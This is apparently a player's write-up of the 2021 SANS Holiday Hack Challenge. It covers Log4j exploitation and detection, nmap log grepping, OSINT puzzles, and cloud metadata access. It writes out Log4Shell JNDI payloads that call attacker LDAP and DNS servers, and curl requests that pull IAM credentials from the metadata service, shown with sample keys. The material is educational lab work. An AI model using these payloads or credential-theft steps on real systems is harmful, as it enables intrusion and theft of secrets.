2021 SANS Holiday Hack Challenge & KringleCon

Dec 2021 - 7 Jan 22

This annual Christmans-themed CTF by SANS is in game format where players help Santa defeat cybersecurity villians and save the holiday season. Once logged in, you see elves in snow.

There's a walkthrough on the recent log4j vulnerability to let players understand what this vulnerability is about under 'Bonus! Blue Log4Jack' and how attackers exploit the Log4j vulnerability under the 'Bonus! Red Log4Jack'.

Bonus! Red Log4Jack

Covering the Red team first as it's a lot shorter. SANS Josh Wright has uploaded his solution for exploiting Log4Jack at https://gist.github.com/joswr1ght/fb361f1f1e58307048aae5c0f38701e4.

After running through his instructions, the final screen is below with the answer.

Bonus! Blue Log4Jack

Follow the guided instructions for the Blue Team and learn along the way!

The Log4j library is valuable to produce consistent logging messages that can be handled flexibly. Unfortunately, multiple vulnerabilities allow attackers to manipulate this functionality in many versions of Log4j 2 before version 2.17.0.

The CVE-2021-44228 Log4j vulnerability is from improper input validation. Log4j includes support for lookup features, where an attacker can supply input that retrieves more data than intended from the system. Re-run the prior Java command, replacing testfile2.txt with the string '${java:version}'

Notice how the error has changed - instead of a file name, the error shows the Java version information. The Log4j lookup command java:version retrieves information from the host OS. Let's try another example: re-run the last command, changing the java:version string to env:APISECRET.

Using the Log4j env lookup, attackers can access local environment variables, possibly disclosing secrets like this one. Log4j also supports lookup requests using the Java Naming and Directory Interface (JNDI). These requests can reach out to an attacker server to request data.

Log4j lookups can also tell the vulnerable server to contact the attacker using LDAP and DNS. Run the startserver.sh command to launch a simple server for testing purposes.

The bottom window is waiting for a connection at the specified IP address and port. Re-run the DisplayFilev2 program, using the Log4j lookup to connect to the server: java DisplayFilev2 '${jndi:ldap://127.0.0.1:1389/Exploit}'

Notice how the server received a connection from the vulnerable application in the server ("Connection received")? This is a critical part of the Log4j vulnerability, where an attacker can force a server to connect to an attacking system to exploit the vulnerability. Press CTRL+C to close the DisplayFilev2 program and continue with this lesson.

To cd address this vulnerability, applications need an updated version of Log4j. Change to the ~/patched directory by running 'cd ~/patched'

This is the same DisplayFilev2.java source, but the Log4j library is updated to a patched version. To use the updated library, change the Java CLASSPATH variable by running 'source classpath.sh'

Compile the DisplayFilev2.java source using the patched Log4j library. Run 'javac DisplayFilev2.java'

Use the Log4j lookup string java:version by running the following command: java DisplayFilev2 '${java:version}'

With the fixed Log4j library, attackers can't use the lookup feature to exploit library. The same program displays the ${java:version} lookup as a literal string, without performing the actual lookup. Next, we'll look at a technique to scan applications for the vulnerable Log4j library. Run 'cd' to return to the home directory.

The log4j2-scan utility is a tool to scan for vulnerable Log4j application use. Run the log4j2-scan utility, specifying the vulnerable directory as the first command-line argument.

Log4j2-scan quickly spots the vulnerable version of Log4j. Repeat this command, changing the search directory to patched.

Log4j2-scan can also scan large directories of files. This server includes the Apache Solr software that uses Log4j in the /var/www/solr directory. Scan this directory with log4j2-scan to identify if the server is vulnerable.

Log4j2-scan finds two vulnerable Log4j libraries: one for the Solr platform, and one for a third-party plugin. Both need to be patched to resolve the vulnerability. Next, we'll look at scanning system logs for signs of Log4j attack.

The CVE-2021-44228 Log4j exploit using JNDI for access is known as Log4shell. It uses the JNDI lookup feature to manipulate logs, gain access to data, or run commands on the vulnerable server. Web application servers are a common target. Let's scan the web logs on this server. Examine the files in the /var/log/www directory.

We can scan web server logs to find requests that include the Log4j lookup syntax using a text pattern matching routine known as a regular expression. Examine the contents of the logshell-search.sh script using 'cat'

This script recursively searches for Log4shell attack syntax in any files. Run the logshell-search.sh command, specifying the /var/log/www directory as the search target.

In this output we see three examples of Log4shell attack. Let's look at each line individually. Re-run the previous command, piping the output to | sed '1!d' to focus on the first line.

In this first attack, we see the attacker is at 10.26.4.27. The Log4j lookup command is sent as a URL GET parameter, attempting to use JDNI to reach the attacker LDAP server at ldap://10.26.4.27:1389 (see in the ${jndi:ldap://10.26.4.27:1389/Evil} string). Re-run the previous command, this time looking at the 2nd line of output.

In this second attack, we see the attacker is at 10.99.3.1. Instead of a URL GET parameter, this time the exploit is sent through the browser User-Agent field. The attacker attempted to use JDNI to reach the attacker DNS server at dns://10.99.3.43, using a different IP than the exploit delivery address. Re-run the previous command, this time looking at the 3rd line of output.

Here we see the attacker is at 10.3.243.6. This attack is also sent through the browser User Agent field, but this more closely resembles the first attack using the attacker LDAP server at 10.3.243.6. The DefinitelyLegitimate string is supplied by the attacker, matching a malicious Java class on the LDAP server to exploit the victim Log4j instance. Run 'next' to continue.

🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬 You've completed the lesson on Log4j vulnerabilities. Run 'exit' to close.

Grepping for Gold

Talk to Greasy GapherGuts at the Frost Tower.

Question 1: What port does 34.76.1.22 have open?

Question 2: What port does 34.77.207.226 have open? Run the same command to search the bigscan.gnmap file.

Question 3: How many hosts appear "Up" in the scan?

Question 4: How many hosts have a web port open? (Let's just use TCP ports 80, 443, and 8080).

Question 5: How many hosts with status Up have no (detected) open TCP ports?

Answer from question 3 was 26,054. Difference of the number of hosts with status Up and no detected open TCP ports will be 402.

Question 6: What's the greatest number of TCP ports any one host has open?

Count the number of open TCP ports by running grep -E "(/open/tcp//.*)" bigscan.gnmap | wc -l. This shows that the file has 25,652 lines of hosts with open TCP ports. Next, trial and error to narrow down to the largest number of TCP port that any host has opened till the result shows 0.

Thaw Frost Tower's Entrance

Find Grimy McTrolkins standing at the Frost Tower entrance.

Scan for Wi-Fi networks and wlan0 shows up. Search manual for iwconfig to learn how to connect to the network. Manual shows parameter option iwconfig eth0 essid "My Network". After connecting to the network, complete setup with curl to the website provided and gain access to the 'Nidus Thermostsat Setup'.

Next, try registering the Thermostat with the command curl http://nidus-setup:8080/register but the image does not show any numbers.

Since the registration doesn't work, and the instructions said to adjust the temperature for frostbite protection, connect to the API using curl http://nidus-setup:8080/apidoc.

Only available api to connect to is the cooler. Running the command below gets a meltdown and challenge is completed!

Moving to Santa's Hall, Fitzy Shortstack is there with his Yara Analysis problem.

To check what files are on the system, run the_critical_elf_app to see which rule is the problem and you get 'yara_rule135'. Change to the yara_rules directory to see what rule that is.

Next, the strings and condition need to be edited to tell the sweetness level of the candy. Use the command vim rules.yar will open the file, and googling about Yara rules doesn't help in solving this question as I am lost when it comes to writing yara rules or programming.

Visit Angel Candysalt for Splunk challenges.

Task 1: Capture the commands Eddie ran most often, starting with git. Looking only at his process launches as reported by Sysmon, record the most common git-related CommandLine that Eddie seemed to use.

Under CommandLine, 'git status' is the most commonly used command after 'docker ps'.

Task 2: Looking through the git commands Eddie ran, determine the remote repository that he configured as the origin for the 'partnerapi' repo. The correct one!

Search for the partnerapi repo index=main sourcetype=ghe_audit_log_monitoring repository="elfnp3/partnerapi"

Lost on me here.. Can't find the answer

Moved on to Piney Sappington for Exif Metadata. OSINT senses tingling and ready for a challenge!

First, examine the current directory and files in it. There is a list of 20 different files, and the exiftool will help to determine when the file was last modified.

Run the command exiftool /home/elf/ | grep -B 45 "Jack Frost" to examine all the files in the current directory /home/elf. Next, grep 45 lines (tried 20 lines, but you can't see the file name) before the "Jack Frost" line shows up. The modified file is shown to be 2021-12-21.docx.

Tangle Coalbox is also at the Courtyard of Sponsors page. The challenge here is Caramel Santaigo. And another OSINT challenge!

Investigate the 3 clues:

  1. They said something about MGRS and 32U NU 05939 98268...

  2. Apparently they really wanted to see what a town hall looks like when it's converted into a giant Advent calendar!

  3. They were dressed for 7.0°C and partly cloudy conditions. The elf got really heated about using tabs for indents.

First clue talks about MGRS, which is a grid system. A quick search on google leads to this website https://legallandconverter.com/p50.html and keying in the grid reference number '32U NU 05939 98268' leads to Stuttgart.

Second clue talks about a giant Advent calendar, a quick search shows that 'The Gengenbach Town Hall' is the said venue.

Depart by sleigh, to Stuttgart and the next question is:

Stuttgart has been celebrating Christmas since 1692. Even the rooftops get decorated. And where else does the side of the town hall become a giant Advent calendar?

The 3 clues are:

  1. I think they left to check out the Défilé de Noël.

  2. They called me and mentioned they were connected via Rogers Wireless.

  3. They were dressed for 0.0°C and fog conditions. Oh, I noticed they had a Firefly themed phone case.

First clue leads us to another name for the 'Défilé de Noël', the Santa Claus parade. Second clue on 'Rogers Wireless' shows that it is a Candian telecomms company HQ in Toronto. Moving on to depart by sleigh to Montreal, Canada.

The next 3 clues are:

  1. I've heard that when British children put letters to Father Christmas in the fireplace, they magically end up there!

  2. They just contacted us from an address in the 80.95.128.0/20 range.

  3. They were dressed for -12.0°C and sunny conditions. The elf mentioned something about Stack Overflow and Golang.

Zooming in on the second clue, the ip address turns up to be in Vammala Finland. Moving on to the next destination, Rovaniemi, Finland.

Clues:

  1. Buddy, a close friend of the elves, once went on an ice skating date under their huge Christmas tree!

  2. They sent me this blurry selfie of themself or someone they met:

  3. They were dressed for 10.6°C and mist conditions. Oh, I noticed they had a Doctor Who themed phone case.

Visit InterRink to key in all the clues and find the elf.

Oh, but the challenge is not solved yet... Poking around shows that this challenge is not about OSINT but flask cookies! There is a link to https://gist.github.com/chriselgee/b9f1861dd9b99a8c1ed30066b25ff80b and it shows what the cookie looks like. However, examining the developer console does not show the cookie at all.

Enter Jack's Office Bathroom to find Noxious O.D'ar on the Instance Metadata Service (IMDS).

🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills, 🎄🎄🎄 interacting with the Instance Metadata Service (IMDS) using curl.

The Instance Metadata Service (IMDS) is a virtual server for cloud assets at the IP address 169.254.169.254. Send a couple ping packets to the server.

ping -c 4 169.254.169.254

IMDS provides information about currently running virtual machine instances. You can use it to manage and configure cloud nodes. IMDS is used by all major cloud providers. Run 'next' to continue.

next

Developers can automate actions using IMDS. We'll interact with the server using the cURL tool. Run 'curl http://169.254.169.254' to access IMDS data.

curl http://169.254.169.254

latest

Different providers will have different formats for IMDS data. We're using an AWS-compatible IMDS server that returns 'latest' as the default response. Access the 'latest' endpoint. Run 'curl http://169.254.169.254/latest'

curl http://169.254.169.254/latest

dynamic

meta-data

IMDS returns two new endpoints: dynamic and meta-data. Let's start with the dynamic endpoint, which provides information about the instance itself. Repeat the request to access the dynamic endpoint: 'curl http://169.254.169.254/latest/dynamic'.

curl http://169.254.169.254/latest/dynamic

fws/instance-monitoring

instance-identity/document

instance-identity/pkcs7

instance-identity/signature

Much of the data retrieved from IMDS will be returned in JavaScript Object Notation (JSON) format. Piping the output to 'jq' will make the content easier to read. Re-run the previous command, sending the output to JQ: 'curl http://169.254.169.254/latest/dynamic/instance-identity/document | jq'

In addition to dynamic parameters set at launch, IMDS offers metadata about the instance as well. Examine the metadata elements available: 'curl http://169.254.169.254/latest/meta-data'

curl http://169.254.169.254/latest/meta-data

​ By accessing the metadata elements, a developer can interrogate information about the system. Take a look at the public-hostname element: 'curl http://169.254.169.254/latest/meta-data/public-hostname'

By accessing the metadata elements, a developer can interrogate information about the system. Take a look at the public-hostname element: 'curl http://169.254.169.254/latest/meta-data/public-hostname'

Many of the data elements returned won't include a trailing newline, which causes the response to blend into the prompt. Re-run the prior command, adding '; echo' to the end of the command. This will add a new line character to the response.

curl http://169.254.169.254/latest/meta-data/public-hostname; echo

ec2-192-0-2-54.compute-1.amazonaws.com

There is a whole lot of information that can be retrieved from the IMDS server. Even AWS Identity and Access Management (IAM) credentials! Request the endpoint 'http://169.254.169.254/latest/meta-data/iam/security-credentials' to see the instance IAM role.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials

elfu-deploy-role

Once you know the role name, you can request the AWS keys associated with the role. Request the endpoint 'http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy- role' to get the instance AWS keys.

http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy- role

{

"Code": "Success",

"LastUpdated": "2021-12-02T18:50:40Z",

"Type": "AWS-HMAC",

"AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",

"SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",

"Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",

"Expiration": "2026-12-02T18:50:40Z"

So far, we've been interacting with the IMDS server using IMDSv1, which does not require authentication. Optionally, AWS users can turn on IMDSv2 that requires authentication. This is more secure, but not on by default. Run 'next' to continue.

next

For IMDSv2 access, you must request a token from the IMDS server using the X-aws-ec2-metadata-token-ttl-seconds header to indicate how long you want the token to be used for (between 1 and 21,600 secods). Examine the contents of the 'gettoken.sh' script in the current directory using 'cat'.

cat gettoken.sh

TOKEN=curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"

This script will retrieve a token from the IMDS server and save it in the environment variable TOKEN. Import it into your environment by running 'source gettoken.sh'.

Now, the IMDS token value is stored in the environment variable TOKEN. Examine the contents of the token by running 'echo $TOKEN'.

echo $TOKEN

gYVa2GgdDYbR6R4AFnk5y2aU0sQirNIIoAcpOUh/aZk=

With the IMDS token, you can make an IMDSv2 request by adding the X-aws-ec2-metadata-token header to the curl request. Access the metadata region information in an IMDSv2 request: 'curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta- data/placement/region'

curl -H "X-aws-ec2-metadata-token: gYVa2GgdDYbR6R4AFnk5y2aU0sQirNIIoAcpOUh/aZk=" http://169.254.169.254/latest/meta-data/placement/region

🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬 You've completed the lesson on Instance Metadata interaction. Run 'exit' to close.

Last updated